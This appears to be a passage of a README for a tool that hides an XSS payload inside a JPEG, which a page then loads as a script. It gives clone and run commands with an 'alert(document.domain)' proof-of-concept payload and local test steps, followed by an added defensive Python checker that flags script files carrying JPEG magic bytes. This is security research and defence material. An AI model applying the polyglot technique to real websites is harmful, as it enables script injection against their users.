- ImageMagick
  ```bash
  sudo apt install imagemagick # on Debian
  ```

```bash
git clone https://github.com/4n86rakam1/xss_injection_in_jpeg.git
cd xss_injection_in_jpeg
python3 exploit.py --payload 'alert(document.domain)' --imagesize 200x200 --output xss.js
```
- Confirm that the JavaScript file for exploiting XSS has been generated.
- Change the `src` attribute value in `index.html` to your output filename, e.g.

  ```html
  <!DOCTYPE html>
  <html lang="en">
    <head>
      <script charset="ISO-8859-1" src="./xss.js"></script>
    </head>
    <body></body>
  </html>
  ```
- Run an HTTP server, e.g.

  ```bash
  python3 -m http.server
  ```

- Open http://localhost:8000 in a browser.

  Tested in Google Chrome Version 114.0.5735.106 (Official Build) (64-bit).
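A defender-side check for the artifact this procedure produces, as an added example that is not part of the original repository: it parses a page's `<script>` tags and flags any local script file whose first bytes are the JPEG magic `FF D8 FF`. The function names and the sample web root are constructed for illustration; the stand-in `xss.js` holds only JPEG magic bytes, not the tool's output.

```python
from html.parser import HTMLParser
from pathlib import Path
import tempfile

JPEG_SOI = b"\xff\xd8\xff"  # every JPEG file starts with these bytes

class ScriptCollector(HTMLParser):
    """Collect (src, charset) for every <script> tag that has a src."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.scripts.append((a["src"], a.get("charset")))

def audit_page(html_path):
    """Return findings for local script files whose bytes are really a JPEG."""
    html_path = Path(html_path)
    parser = ScriptCollector()
    parser.feed(html_path.read_text(encoding="utf-8"))
    findings = []
    for src, charset in parser.scripts:
        if "://" in src or src.startswith("//"):
            continue  # remote script: out of scope for this local audit
        target = html_path.parent / src
        if not target.is_file():
            continue
        if target.read_bytes()[:3] == JPEG_SOI:
            findings.append({"src": src, "charset": charset,
                             "reason": "script file has JPEG magic bytes"})
    return findings

def demo():
    """Build a constructed web root (hypothetical files) and audit it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        # Constructed stand-in: JPEG magic bytes plus padding, nothing executable.
        (root / "xss.js").write_bytes(JPEG_SOI + b"\xe0" + b"\x00" * 16)
        (root / "app.js").write_text("console.log('ok');")
        (root / "index.html").write_text(
            '<!DOCTYPE html><html><head>'
            '<script charset="ISO-8859-1" src="./xss.js"></script>'
            '<script src="./app.js"></script></head><body></body></html>')
        return audit_page(root / "index.html")

if __name__ == "__main__":
    print(demo())
```

The returned `charset` value lets a reviewer see when a flagged script tag also forces a single-byte encoding, as the `index.html` above does.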